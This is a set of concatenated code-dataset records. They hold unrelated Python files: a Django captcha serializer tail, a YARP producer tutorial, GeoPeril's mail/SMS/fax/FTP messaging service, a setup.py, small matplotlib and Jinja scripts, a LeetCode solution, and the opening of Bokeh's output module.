redis_conn.delete('img_%s'%image_code_id)\n except RedisError as e:\n logger.error(e)\n\n if redis_text.decode().lower() != text.lower():\n raise serializers.ValidationError('验证码输入有误')\n\n return attrs","sub_path":"mall/apps/verifications/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"246172457","text":"\"\"\"\nBSD 2-Clause License\n\nCopyright (c) 2021, Nicola Severino Russi (nicola.russi@iit.it),\n Davide De Tommaso (davide.detommaso@iit.it)\n Social Cognition in Human-Robot Interaction\n Istituto Italiano di Tecnologia, Genova\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport yarp\nimport random\nfrom random import randint\nimport time\n\n# create the network\nyarp.Network.init()\n\n# define port and bottle\nport = yarp.Port()\nbottle = yarp.Bottle()\n\n# activate port\nport.open(\"/producer\")\n\n# define port name to connect\nbuffer = \"/buffer_in\"\n\n# items to produce\nitemsToProduce = [\"apple\", \"orange\", \"pear\", \"banana\", \"kiwi\", \"watermelon\", \"peach\", \"grapes\",\"strawberry\"]\n\nprint(\"Producer writer started\")\nwhile itemsToProduce:\n # before writing check connection\n if yarp.Network.isConnected(port.getName(), buffer):\n # prepare the message\n bottle.clear()\n item = random.choice(itemsToProduce)\n itemsToProduce.remove(item)\n bottle.addString(item)\n # send message\n port.write(bottle)\n print (\"sended \", bottle.toString())\n time.sleep(randint(1,2))\n\n# deactivate ports\nport.close()\nprint(\"Producer writer ended\")\n\n# close the network\nyarp.Network.fini()\n","sub_path":"workdir/tutorials/producer-consumer/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"410753598","text":"# GeoPeril - A platform for the computation and web-mapping of hazard specific\n# geospatial data, as well as for serving functionality to handle, share, and\n# communicate threat specific information in a collaborative environment.\n#\n# Copyright (C) 2021 GFZ German Research Centre for Geosciences\n#\n# SPDX-License-Identifier: Apache-2.0\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the Licence is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the Licence for the specific language governing permissions and\n# limitations under the Licence.\n#\n# Contributors:\n# Johannes Spazier (GFZ)\n# Sven Reissland (GFZ)\n# Martin Hammitzsch (GFZ)\n# Matthias Rüster (GFZ)\n# Hannes Fuchs (GFZ)\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import formatdate, make_msgid\nfrom xml.etree import ElementTree\nimport smtplib\nimport ftplib\nimport io\nimport os\nimport datetime\nimport copy\nimport logging\nimport requests\nimport cherrypy\nfrom cherrypy.lib.static import serve_file\nfrom basesrv import BaseSrv\nfrom base import jsfail, jsdeny, jssuccess, startapp\n\nlogger = logging.getLogger(\"MsgSrv\")\n\n\ndef sendmail(\n send_from,\n send_to,\n send_subject,\n send_text,\n send_cc=\"\",\n send_date=None,\n send_msgid=None\n):\n msg = MIMEMultipart()\n msg[\"From\"] = send_from\n if isinstance(send_to, str):\n msg[\"To\"] = send_to\n elif isinstance(send_to, list) and send_to != []:\n msg[\"To\"] = \", \".join(send_to)\n if isinstance(send_cc, str):\n msg[\"Cc\"] = send_cc\n elif isinstance(send_cc, list) and send_cc != []:\n msg[\"Cc\"] = \", \".join(send_cc)\n msg[\"Subject\"] = send_subject\n msg[\"Date\"] = formatdate() if send_date is None else send_date\n msg[\"Message-ID\"] = make_msgid() if send_msgid is None else send_msgid\n msg.attach(MIMEText(send_text, _charset='utf-8'))\n\n smtp = smtplib.SMTP('cgp1.gfz-potsdam.de')\n errors = []\n success = False\n try:\n res = smtp.send_message(msg)\n for key, val in res.items():\n errors.append((key, (val[0], val[1].decode('utf-8'))))\n success = True\n except smtplib.SMTPRecipientsRefused as ex:\n errors = {}\n for key, val in ex.recipients.items():\n errors.append((key, (val[0], val[1].decode('utf-8'))))\n except smtplib.SMTPSenderRefused as ex:\n errors = [(ex.sender, (ex.smtp_code, str(ex.smtp_error)))]\n success = None\n smtp.quit()\n print(\"Mail from\", msg[\"From\"], \"to\", msg[\"To\"], success, errors)\n return success, errors\n\n\ndef sendtwilliosms(twisid, twitoken, twifrom, sendto, text):\n if isinstance(sendto, str):\n errors = []\n success = []\n auth = requests.auth.HTTPBasicAuth(twisid, twitoken)\n payload = {}\n payload[\"To\"] = sendto.strip()\n payload[\"From\"] = twifrom\n payload[\"Body\"] = text\n req = requests.post(\n \"https://api.twilio.com/2010-04-01/Accounts/%s/Messages\" % twisid,\n data=payload,\n auth=auth\n )\n elm = ElementTree.fromstring(req.text)\n exc = elm.find(\"RestException\")\n if exc is None:\n for side in elm.iter(\"Sid\"):\n success.append((sendto, side.text))\n break\n else:\n errors.append(\n (sendto, ElementTree.tostring(exc, encoding='unicode'))\n )\n print(\n \"SMS from\", payload[\"From\"],\n \"to\", payload[\"To\"],\n success, errors\n )\n return success, errors\n if isinstance(sendto, list):\n errors = []\n success = []\n for sto in sendto:\n succ, err = sendtwilliosms(twisid, twitoken, twifrom, sto, text)\n errors += err\n success += succ\n return success, errors\n return None, None\n\n\nclass MsgSrv(BaseSrv):\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def instsms(self, apiver, inst, secret, username, to, text):\n if apiver == \"1\":\n inst = self._db[\"institutions\"].find_one({\n \"name\": inst,\n \"secret\": secret\n })\n if inst is not None and inst.get(\"instsms\", False):\n to = to.replace(\",\", \";\").split(\";\")\n user = self._db[\"users\"].find_one({\n \"username\": username\n })\n twisid = user[\"properties\"].get(\"TwilioSID\", \"\")\n twitoken = user[\"properties\"].get(\"TwilioToken\", \"\")\n twifrom = user[\"properties\"].get(\"TwilioFrom\", \"\")\n success, errors = sendtwilliosms(\n twisid, twitoken, twifrom, to, text\n )\n if success != []:\n return jssuccess(sentsmsids=success, errors=errors)\n return jsfail(errors=errors)\n return jsdeny()\n return jsfail(errors=[\"API version not supported.\"])\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def instmail(\n self, apiver, inst, secret,\n fromaddr, toaddr, subject, text, cc=\"\"\n ):\n if apiver == \"1\":\n inst = self._db[\"institutions\"].find_one({\n \"name\": inst,\n \"secret\": secret\n })\n if inst is not None and inst.get(\"instmail\", False):\n toaddr = toaddr.replace(\",\", \" \").replace(\";\", \" \").split()\n cc = cc.replace(\",\", \" \").replace(\";\", \" \").split()\n success, errors = sendmail(fromaddr, toaddr, subject, text, cc)\n if success:\n return jssuccess(errors=errors)\n return jsfail(errors=errors)\n return jsdeny()\n return jsfail(errors=[\"API version not supported.\"])\n\n @cherrypy.expose\n def readmsg(self, apiver, msgid):\n user = self.getUser()\n if user is not None:\n if apiver == \"1\":\n self._db[\"messages_received\"].update(\n {\n \"Message-ID\": msgid,\n \"ReadTime\": None,\n \"ReceiverID\": user[\"_id\"]\n },\n {\n \"$set\": {\"ReadTime\": datetime.datetime.utcnow()}\n }\n )\n msg = self._db[\"messages_received\"].find_one({\n \"Message-ID\": msgid,\n \"ReceiverID\": user[\"_id\"]\n })\n if msg is None:\n rtime = None\n else:\n rtime = msg[\"ReadTime\"].strftime(\"%b %d, %Y %I:%M:%S %p\")\n return jssuccess(readtime=rtime)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n def displaymapmsg(self, apiver, msgid):\n user = self.getUser()\n if user is not None:\n if apiver == \"1\":\n self._db[\"messages_received\"].update(\n {\n \"Message-ID\": msgid,\n \"MapDisplayTime\": None,\n \"ReceiverID\": user[\"_id\"]\n },\n {\n \"$set\": {\"MapDisplayTime\": datetime.datetime.utcnow()}\n }\n )\n msg = self._db[\"messages_received\"].find_one({\n \"Message-ID\": msgid,\n \"ReceiverID\": user[\"_id\"]\n })\n if msg is None:\n mdtime = None\n else:\n mdtime = msg[\"MapDisplayTime\"] \\\n .strftime(\"%b %d, %Y %I:%M:%S %p\")\n return jssuccess(mapdisplaytime=mdtime)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def intmsg(\n self, apiver, to, subject, text,\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"intmsg\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"INTERNAL\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n dbmsg[\"Text\"] = text\n dbmsg[\"Subject\"] = subject\n errors = []\n success = False\n send_to = to.replace(\",\", \" \").replace(\";\", \" \").split()\n for sto in send_to:\n ruser = self._db[\"users\"].find_one({\"username\": sto})\n if ruser is None:\n errors.append((sto, \"Unknown User %s\" % sto))\n else:\n success = True\n rmsg = copy.deepcopy(dbmsg)\n rmsg[\"ReceiverID\"] = ruser[\"_id\"]\n rmsg[\"ReadTime\"] = None\n rmsg[\"MapDisplayTime\"] = None\n self._db[\"messages_received\"].insert(rmsg)\n msgevt2 = {\n \"id\": rmsg[\"Message-ID\"],\n \"user\": rmsg[\"ReceiverID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_recv\",\n }\n self._db[\"events\"].insert(msgevt2)\n dbmsg[\"To\"] = send_to\n dbmsg[\"errors\"] = errors\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if success:\n return jssuccess(errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def mail(\n self, apiver, to, subject, text, cc=\"\",\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"mail\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"MAIL\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n send_from = user[\"username\"]\n send_to = to.replace(\",\", \" \").replace(\";\", \" \").split()\n send_cc = cc.replace(\",\", \" \").replace(\";\", \" \").split()\n send_subject = str(subject)\n send_text = str(text)\n send_date = formatdate()\n send_msgid = make_msgid()\n\n dbmsg[\"From\"] = send_from\n if send_to != []:\n dbmsg[\"To\"] = send_to\n if send_cc != []:\n dbmsg[\"Cc\"] = send_cc\n dbmsg[\"Subject\"] = send_subject\n dbmsg[\"Date\"] = send_date\n dbmsg[\"Message-ID\"] = send_msgid\n dbmsg[\"Text\"] = send_text\n\n success, errors = sendmail(\n send_from, send_to, send_subject,\n send_text, send_cc, send_date, send_msgid\n )\n if errors != [] and success is not None:\n errtext = \"There were errors while sending your Message.\\n\"\n for err in errors:\n errtext += \"\\n%s:\\t%d: %s\" % \\\n (err[0], err[1][0], err[1][1])\n sendmail(\n user[\"username\"],\n user[\"username\"],\n \"Error in mailing system\",\n errtext\n )\n\n dbmsg[\"errors\"] = errors\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n\n if success:\n return jssuccess(errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def fax(\n self, apiver, to, text,\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"fax\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"FAX\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n to = to.replace(\",\", \";\").split(\";\")\n dbmsg[\"To\"] = to\n dbmsg[\"Text\"] = text\n errors = []\n success = []\n for fnr in to:\n payload = {}\n payload[\"Username\"] = user[\"properties\"] \\\n .get(\"InterfaxUsername\", \"\")\n payload[\"Password\"] = user[\"properties\"] \\\n .get(\"InterfaxPassword\", \"\")\n payload[\"FileType\"] = \"HTML\"\n payload[\"FaxNumber\"] = fnr\n payload[\"Data\"] = '
    ' + text + \\\n                        '
    '\n req = requests.post(\n \"https://ws.interfax.net/dfs.asmx/SendCharFax\",\n data=payload\n )\n elm = ElementTree.fromstring(req.text)\n if int(elm.text) >= 0:\n success.append((fnr, elm.text))\n else:\n errors.append((fnr, elm.text))\n dbmsg[\"errors\"] = errors\n dbmsg[\"sentfaxids\"] = success\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if success != []:\n return jssuccess(sentfaxids=success, errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def sms(self, apiver, to, text, evid=None, parentid=None, groupID=None):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"sms\", False):\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"SMS\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n to = to.replace(\",\", \";\").split(\";\")\n dbmsg[\"To\"] = to\n dbmsg[\"Text\"] = text\n\n twisid = user[\"properties\"].get(\"TwilioSID\", \"\")\n twitoken = user[\"properties\"].get(\"TwilioToken\", \"\")\n twifrom = user[\"properties\"].get(\"TwilioFrom\", \"\")\n success, errors = sendtwilliosms(\n twisid, twitoken, twifrom, to, text\n )\n\n dbmsg[\"sentsmsids\"] = success\n dbmsg[\"errors\"] = errors\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if success != []:\n return jssuccess(sentsmsids=success, errors=errors)\n return jsfail(errors=errors)\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n @cherrypy.expose\n @cherrypy.tools.allow(methods=['POST'])\n def ftp(\n self, apiver, fname, text,\n evid=None, parentid=None, groupID=None, msgnr=None\n ):\n user = self.getUser()\n if user is not None and user[\"permissions\"].get(\"ftp\", False) and \\\n fname is not None and fname != \"\":\n if apiver == \"1\":\n dbmsg = {\n \"Type\": \"FTP\",\n \"SenderID\": user[\"_id\"],\n \"CreatedTime\": datetime.datetime.utcnow(),\n \"EventID\": evid,\n \"ParentId\": parentid,\n \"Message-ID\": make_msgid(),\n }\n if msgnr is not None:\n dbmsg[\"NextMsgNr\"] = int(msgnr)\n host = user[\"properties\"].get(\"FtpHost\", \"\")\n port = user[\"properties\"].get(\"FtpPort\", 21)\n path = user[\"properties\"].get(\"FtpPath\", \"\") + \"/\" + fname\n username = user[\"properties\"].get(\"FtpUser\", \"anonymous\")\n password = user[\"properties\"].get(\"FtpPassword\", \"anonymous\")\n dbmsg[\"To\"] = [\"%s@%s:%d%s\" % (username, host, port, path)]\n dbmsg[\"Text\"] = text\n error = None\n try:\n ftp = ftplib.FTP()\n ftp.connect(host, port)\n ftp.login(username, password)\n ftp.set_pasv(True)\n path = os.path.normpath(path)\n ftp.cwd(os.path.dirname(path))\n ftp.storbinary(\n \"STOR %s\" % os.path.basename(path),\n io.BytesIO(bytes(text, \"utf-8\"))\n )\n ftp.quit()\n except ftplib.all_errors as err:\n error = str(err)\n dbmsg[\"errors\"] = error\n self._db[\"messages_sent\"].insert(dbmsg)\n msgevt = {\n \"id\": dbmsg[\"Message-ID\"],\n \"user\": dbmsg[\"SenderID\"],\n \"timestamp\": dbmsg[\"CreatedTime\"],\n \"event\": \"msg_sent\",\n }\n self._db[\"events\"].insert(msgevt)\n if error is None:\n return jssuccess()\n return jsfail(errors=[error])\n return jsfail(errors=[\"API version not supported.\"])\n return jsdeny()\n\n\napplication = startapp(MsgSrv)\n","sub_path":"backend/wsgi/msgsrv.py","file_name":"msgsrv.py","file_ext":"py","file_size_in_byte":20215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"253200578","text":"__author__ = 'creeper'\n# import ez_setup\n# ez_setup.use_setuptools()\nfrom setuptools import setup,find_packages\n\nsetup(\n url=' ', \n name = 'django_analysis_tool',\n version = '1.1.21',\n description= 'Tools to analysis lab task',\n author = \"creeper\",\n author_email = 'creeper@163.com',\n packages = find_packages(),\n package_dir = {'': '.'},\n package_data = {\"\":[\"./db.sqlite3\",\n \"./manage.py\",\n \"./run.py\",\n \"./lab_analysis_tools/templates/lab_analysis_tools/*\",\n \"./lab/instrumentation_json/*\",\n \"./lab/static/index/css/*\",\n \"./lab/static/index/fonts/*\",\n \"./lab/static/index/img/*\",\n \"./lab/static/index/js/*\",\n \"./lab/static/task_all/css/*\",\n \"./lab/static/task_all/fonts/*\",\n \"./lab/static/task_all/js/*\",\n \"./lab/static/zip/css/*\",\n \"./lab/static/zip/fonts/*\",\n \"./lab/static/zip/js/*\",\n \"./lab/static/wait/_css/*\",\n \"./lab/static/wait/_scripts/*\"\n ]},\n scripts=[\"scripts/run.py\"],\n install_requires=[\n 'Django==1.9.4',\n 'threadpool==1.3.2',\n ],\n include_package_data = True\n)\n","sub_path":"pypi_install_script/django_analysis_tool-1.1.21/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"423970696","text":"import matplotlib.pyplot as plt\r\n\r\n\r\ndef sample1(request):\r\n plt.plot([3, 1, 4, 1, 5, 9, 2, 6, 5], label=\"Data 1\")\r\n plt.plot([3, 5, 8, 9, 7, 9, 3, 2, 3], label=\"Data 2\")\r\n plt.legend() # 凡例を表示\r\n plt.title(\"Graph Title\")\r\n plt.xlabel(\"X-axis\")\r\n plt.ylabel(\"Y-axis\")\r\n plt.show()\r\n return(request)\r\n","sub_path":"barep/report/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"124633515","text":"#!/usr/bin/env python3\nfrom jinja2 import Template\nimport cgi\n\npath = \"/Users/matthias.bothe/code/foundations/foundations-restaurants/restaurants.txt\"\ndata = open(path, \"r\")\nall_restaurants = data.read()\n\nclass Restaurant:\n\n def __init__(self, name, location):\n\n self.name = name\n self.location = location\n\n def getName(self):\n return self.name\n\n def getLocation(self):\n return self.location\n\ndef show_restaurants(all_restaurants):\n for line in all_restaurants:\n line = line[4:]\n name = line.split(\",\")[0]\n location = line.split(\",\")[1]\n restaurant = Restaurant(name, location)\n tm = Template(\"The name is {{ per.getName() }} and it is located in {{ per.getLocation() }}\")\n msg = tm.render(per=restaurant)\n print (\"\"\"\n\n\n \n Hello!\n \n \n \n \n \n \n \n \n \n

    {}.

    \n Try again\n \n\n\"\"\".format(msg)\n )\n\ndata.close()","sub_path":"scripts/render-restaurants.py","file_name":"render-restaurants.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"42"} +{"seq_id":"17486930","text":"class Solution:\n def shortestDistance(self, words, word1, word2):\n \"\"\"\n :type words: List[str]\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n min_distance, lookup = len(words), {}\n for i, v in enumerate(words):\n if v not in lookup:\n lookup[v] = {i}\n else:\n lookup[v].add(i)\n for i in lookup[word1]:\n for j in lookup[word2]:\n min_distance = min(min_distance, abs(j - i))\n return min_distance\n\nif __name__ == \"__main__\":\n solution = Solution()\n result = solution.shortestDistance([\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"], \"makes\", \"practice\")\n print(result)\n","sub_path":"200-300/243_shortest_word_distance.py","file_name":"243_shortest_word_distance.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"438109460","text":"#-----------------------------------------------------------------------------\n# Copyright (c) 2012 - 2015, Continuum Analytics, Inc. All rights reserved.\n#\n# Powered by the Bokeh Development Team.\n#\n# The full license is in the file LICENSE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n''' Functions for configuring Bokeh output.\n\n'''\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\nfrom __future__ import absolute_import\n\n# Stdlib imports\nimport logging\nlogger = logging.getLogger(__name__)\n\nimport io\nimport itertools\nimport json\nimport os\nimport warnings\n\n# Third-party imports\n\n# Bokeh imports\nfrom .core.state import State\nfrom .document import Document\nfrom .embed import notebook_div, standalone_html_page_for_models, autoload_server\nfrom .models import Component\nfrom .models.plots import GridPlot\nfrom .models.layouts import HBox, VBox, VBoxForm\nfrom .model import _ModelInDocument\nfrom .util.notebook import load_notebook, publish_display_data, get_comms\nfrom .util.string import decode_utf8\nfrom .util.serialization import make_id\nimport bokeh.util.browser as browserlib # full import needed for test mocking to work\nfrom .client import DEFAULT_SESSION_ID, push_session, show_session\n\n#-----------------------------------------------------------------------------\n# Globals and constants\n#-----------------------------------------------------------------------------\n\n_new_param = {'tab': 2, 'window': 1}\n\n_state = State()\n\n#-----------------------------------------------------------------------------\n# Local utilities\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Classes and functions\n#-----------------------------------------------------------------------------\n\nclass _CommsHandle(object):\n\n _json = {}\n\n def __init__(self, comms, doc, json):\n self._cellno = None\n try:\n from IPython import get_ipython\n ip = get_ipython()\n hm = ip.history_manager\n p_prompt = list(hm.get_tail(1, include_latest=True))[0][1]\n self._cellno = p_prompt\n except Exception as e:\n logger.debug(\"Could not get Notebook cell number, reason: %s\", e)\n\n self._comms = comms\n self._doc = doc\n self._json[doc] = json\n\n def _repr_html_(self):\n if self._cellno is not None:\n return \"

    <Bokeh Notebook handle for In[%s]>

    \" % str(self._cellno)\n else:\n return \"

    <Bokeh Notebook handle>

    \"\n\n @property\n def comms(self):\n return self._comms\n\n @property\n def doc(self):\n return self._doc\n\n @property\n def json(self):\n return self._json[self._doc]\n\n def update(self, doc, json):\n self._doc = doc\n self._json[doc] = json\n\ndef output_file(filename, title=\"Bokeh Plot\", autosave=False, mode=\"cdn\", root_dir=None):\n '''Configure the default output state to generate output saved\n to a file when :func:`show` is called.\n\n Does not change the current Document from curdoc(). File,\n server, and notebook output may be active at the same time, so\n this does not clear the effects of output_server() or\n output_notebook().\n\n Args:\n filename (str) : a filename for saving the HTML document\n\n title (str, optional) : a title for the HTML document (default: \"Bokeh Plot\")\n\n autosave (bool, optional) : whether to automatically save (default: False)\n If True, then Bokeh plotting APIs may opt to automatically\n save the file more frequently (e.g., after any plotting\n command). If False, then the file is only saved upon calling\n :func:`show` or :func:`save`.\n\n mode (str, optional) : how to include BokehJS (default: ``'inline'``)\n One of: ``'inline'``, ``'cdn'``, ``'relative(-dev)'`` or\n ``'absolute(-dev)'``. See :class:`bokeh.resources.Resources` for more details.\n\n root_dir (str, optional) : root directory to use for 'absolute' resources. (default: None)\n This value is ignored for other resource types, e.g. ``INLINE`` or\n ``CDN``.\n\n Returns:\n None\n\n .. note::\n Generally, this should be called at the beginning of an interactive\n session or the top of a script.\n\n .. warning::\n This output file will be overwritten on every save, e.g., each time\n show() or save() is invoked, or any time a Bokeh plotting API\n causes a save, if ``autosave`` is True.\n\n '''\n _state.output_file(\n filename,\n title=title,\n autosave=autosave,\n mode=mode,\n root_dir=root_dir\n )\n\ndef output_notebook(resources=None, verbose=False, hide_banner=False):\n ''' Configure the default output state to generate output in\n Jupyter/IPython notebook cells when :func:`show` is called.\n\n If output_server() has also been called, the notebook cells\n are loaded from the configured server; otherwise, Bokeh pushes\n HTML to the notebook directly.\n\n Args:\n resources (Resource, optional) :\n How and where to load BokehJS from (default: INLINE)\n\n verbose (bool, optional) :\n whether to display detailed BokehJS banner (default: False)\n\n hide_banner (bool, optional):\n whether to hide the Bokeh banner (default: False)\n\n Returns:\n None\n\n .. note::\n Generally, this should be called at the beginning of an interactive\n session or the top of a script.\n\n '''\n load_notebook(resources, verbose, hide_banner)\n _state.output_notebook()\n\n# usually we default session_id to \"generate a random one\" but\n# here we default to a hardcoded one. This is to support local\n# usage e.g. with a notebook.\ndef output_server(session_id=DEFAULT_SESSION_ID, url=\"default\", app_path=\"/\", autopush=False):\n \"\"\" Configure the default output state to push its document to a\n session on a Bokeh server.\n\n Sessions are in-memory and not persisted to disk; in a typical\n production deployment, you would have a fresh session ID for each\n browser tab. If different users share the same session ID, it will\n create security and scalability problems.\n\n ``output_server()`` defaults to always using the\n ``session_id`` ``\"default\"``, which is useful for running\n local demos or notebooks. However, if you are creating\n production sessions, you'll need to set ``session_id`` to None\n (to generate a fresh ID) or to a session ID generated elsewhere.\n\n File, server, and notebook output may be active at the same\n time, so output_server() does not clear the effects of\n output_file() or output_notebook(). output_server() changes\n the behavior of output_notebook(), so the notebook will load\n output cells from the server rather than receiving them as\n inline HTML.\n\n Args:\n session_id (str, optional) : Name of session to push on Bokeh server (default: \"default\")\n Any existing session with the same name will be overwritten.\n\n url (str, optional) : base URL of the Bokeh server (default: \"default\")\n If \"default\" use the default localhost URL.\n\n app_path (str, optional) : relative path of the app on the Bokeh server (default: \"/\")\n\n autopush (bool, optional) : whether to automatically push (default: False)\n If True, then Bokeh plotting APIs may opt to automatically\n push the document more frequently (e.g., after any plotting\n command). If False, then the document is only pushed upon calling\n :func:`show` or :func:`push`.\n\n Returns:\n None\n\n .. warning::\n Calling this function will replace any existing server-side document in the named session.\n\n \"\"\"\n\n _state.output_server(session_id=session_id, url=url, app_path=app_path, autopush=autopush)\n\ndef set_curdoc(doc):\n '''Configure the current document (returned by curdoc()).\n\n This is the document we will save or push according to\n output_file(), output_server(), etc. configuration.\n\n Args:\n doc (Document) : Document we will output.\n\n Returns:\n None\n\n .. note::\n Generally, this should be called at the beginning of an interactive\n session or the top of a script.\n\n .. warning::\n Calling this function will replace any existing document.\n\n '''\n _state.document = doc\n\ndef curdoc():\n ''' Return the document for the current default state.\n\n Returns:\n doc : the current default document object.\n\n '''\n return _state.document\n\ndef curstate():\n ''' Return the current State object\n\n Returns:\n state : the current default State object\n '''\n return _state\n\ndef show(obj, browser=None, new=\"tab\"):\n ''' Immediately display a plot object.\n\n In an IPython/Jupyter notebook, the output is displayed in an output\n cell. Otherwise, a browser window or tab is autoraised to display the\n plot object.\n\n If both a server session and notebook output have been configured on\n the default output state then the notebook output will be generated to\n load the plot from that server session.\n\n Args:\n obj (Component object) : a plot object to display\n\n browser (str, optional) : browser to show with (default: None)\n For systems that support it, the **browser** argument allows\n specifying which browser to display in, e.g. \"safari\", \"firefox\",\n \"opera\", \"windows-default\" (see the ``webbrowser`` module\n documentation in the standard lib for more details).\n\n new (str, optional) : new file output mode (default: \"tab\")\n For file-based output, opens or raises the browser window\n showing the current output file. If **new** is 'tab', then\n opens a new tab. If **new** is 'window', then opens a new window.\n\n Returns:\n when in a a jupyter notebook (with 